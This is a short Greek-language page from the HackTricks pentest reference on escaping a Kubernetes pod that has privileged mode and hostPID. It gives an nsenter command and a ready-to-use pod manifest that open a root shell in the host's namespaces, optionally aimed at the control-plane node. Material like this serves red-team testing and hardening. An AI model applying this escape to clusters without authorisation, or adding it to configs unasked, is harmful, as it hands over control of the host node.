Pod Escape Privileges

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Προνομιούχα και hostPID

Με αυτά τα δικαιώματα θα έχετε πρόσβαση στις διεργασίες των κεντρικών υπολογιστών και αρκετά προνόμια για να εισέλθετε στο εσωτερικό του namespace μίας από τις διεργασίες του κεντρικού υπολογιστή. Σημειώστε ότι ενδεχομένως να μην χρειάζεστε προνομιούχα αλλά απλά κάποιες δυνατότητες και άλλες πιθανές παρακάμψεις ασφαλείας (όπως το apparmor και/ή το seccomp).

Απλά εκτελώντας κάτι παρόμοιο με το παρακάτω θα σας επιτρέψει να δραπετεύσετε από το pod:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Παράδειγμα ρύθμισης:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated